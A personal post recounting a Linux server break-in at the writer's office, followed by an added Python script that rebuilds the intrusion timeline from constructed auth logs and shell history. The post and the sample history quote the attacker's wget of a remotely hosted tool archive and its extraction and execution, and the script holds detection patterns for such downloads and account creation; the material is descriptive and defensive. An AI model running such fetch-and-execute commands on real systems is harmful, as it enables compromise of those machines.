We were hacked today at work. The systems guy opened the firewall this morning to allow a potential client in to demo some software on our system. We usually only allow access via the Cisco VPN.
At 10:12AM, somebody managed to login as one of our users. He did a wget to get a file from some computer on the web and un-tarred it to run his own programs. After about 49 minutes, he had the root password. As root, he created his own user account. He was logged in this account for about 22 minutes before the system guy noticed and started to kill the guy's processes. He then changed the root password, the original user's password and deleted some files before the system guy killed him and closed the port at about 11:45AM.
He managed to get back in on another port at 2:03pm while the system guy was in a meeting. I killed his shell and then we pulled the plug on the Nortel switch, effectively killing the internet for the whole office.
We had the Bell forensic guy in and I left at about 3:00pm as they brought down the Linux servers and I had nothing to do. I think they were going to find all the info they could and then scrub the disk and restore a backup.
I don't know if they would be able to find the guy with his IP address. He created a user "usher" and got a file called team2.tgz from
http://usherul.0catch.com/team2.tgz . He then did a tar -xfzv team2.tgz and then he cd'd to the team2 directory he created and started running programs there. Apparently, 0catch.com is an ISP, so either usherul is the hacker's account or one of his victims.
I don't know if the guy got any of our files. There were a lot of text files there with some client info. The machine is used for conversion of data to an Oracle database. The production database runs on another machine and was not touched.
It was kind of scary. He got kind of pissed when he was discovered and deleted some files on the development box and changed passwords. I don't think that's a usual way of hacking.
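The sequence above (login, fetch an archive, unpack and run it, get root, add an account, change passwords) is exactly what a responder reconstructs from auth logs and the compromised account's shell history. The script below is an added example written for this post, not anything the poster or the Bell forensic team ran: it parses constructed syslog-style auth.log lines and a constructed .bash_history (the hostname "devbox", the user "jsmith", the source IP, PIDs and the year are made up; the "usher" account and the team2.tgz URL are taken from the post), builds the timeline, measures time-to-root, and flags the download/extract/useradd pattern.

```python
# Added example (not from the original post): rebuild an intrusion timeline from
# constructed auth.log lines and a recovered shell history, and flag the
# download -> extract -> root -> new account -> password change sequence.
import re
from datetime import datetime

# Constructed sample auth.log; hostname, user, IP, PIDs and times are made up.
AUTH_LOG = """\
Mar 12 10:12:07 devbox sshd[4120]: Accepted password for jsmith from 203.0.113.45 port 51122 ssh2
Mar 12 11:01:33 devbox su[4410]: (pam_unix) session opened for user root by jsmith(uid=1001)
Mar 12 11:02:10 devbox useradd[4422]: new user: name=usher, UID=1002, GID=1002, home=/home/usher, shell=/bin/bash
Mar 12 11:25:48 devbox passwd[4501]: (pam_unix) password changed for root
Mar 12 11:26:02 devbox passwd[4503]: (pam_unix) password changed for jsmith
"""

# Constructed .bash_history of the compromised account; URL and archive name are from the post.
SHELL_HISTORY = """\
wget http://usherul.0catch.com/team2.tgz
tar -xfzv team2.tgz
cd team2
./run
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ (?P<proc>[a-z]+)\[\d+\]: (?P<msg>.*)$")
YEAR = 2004  # classic syslog lines carry no year; assumed for the constructed sample


def parse_auth(text):
    """Return (datetime, process, message) tuples for each parseable auth.log line."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["proc"], m["msg"]))
    return sorted(events)


def _grab(events, proc, rx):
    """Collect the first regex group from messages logged by a given process."""
    out = []
    for _, p, msg in events:
        if p == proc:
            m = re.search(rx, msg)
            if m:
                out.append(m.group(1))
    return out


def suspicious_history(text):
    """Flag history lines matching the fetch-archive / extract / add-account pattern."""
    patterns = {
        "download_archive": re.compile(r"\b(wget|curl)\b.*\.(tgz|tar\.gz|tar)\b"),
        "extract_archive": re.compile(r"\btar\b.*\.(tgz|tar\.gz|tar)\b"),
        "new_account": re.compile(r"\b(useradd|adduser)\b"),
    }
    flags = []
    for line in text.splitlines():
        for name, rx in patterns.items():
            if rx.search(line):
                flags.append((name, line))
    return flags


def summarize(auth_text, history_text):
    """Timeline summary: first login, time to root, accounts added, passwords changed."""
    events = parse_auth(auth_text)
    login = next((ts for ts, proc, msg in events
                  if proc == "sshd" and msg.startswith("Accepted")), None)
    root = next((ts for ts, proc, msg in events
                 if proc == "su" and "for user root" in msg), None)
    minutes = int((root - login).total_seconds() // 60) if login and root else None
    return {
        "first_login": login,
        "root_at": root,
        "minutes_to_root": minutes,
        "new_accounts": _grab(events, "useradd", r"name=(\w+)"),
        "password_changes": _grab(events, "passwd", r"password changed for (\w+)"),
        "history_flags": suspicious_history(history_text),
    }


if __name__ == "__main__":
    for ts, proc, msg in parse_auth(AUTH_LOG):
        print(f"{ts:%H:%M:%S} {proc:8s} {msg}")
    for key, value in summarize(AUTH_LOG, SHELL_HISTORY).items():
        print(f"{key}: {value}")
```

On the constructed sample the summary reports 49 minutes from first login to root, one added account ("usher") and password changes for root and the original user, matching the shape of the incident described. In a real response the same parsing is run over the log copies taken before the box is rebuilt, since the attacker here deleted files and changed passwords once discovered and a restore from backup will erase the evidence.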
We'll have to find another way of running a demo, probably by using VPN.
Bummer.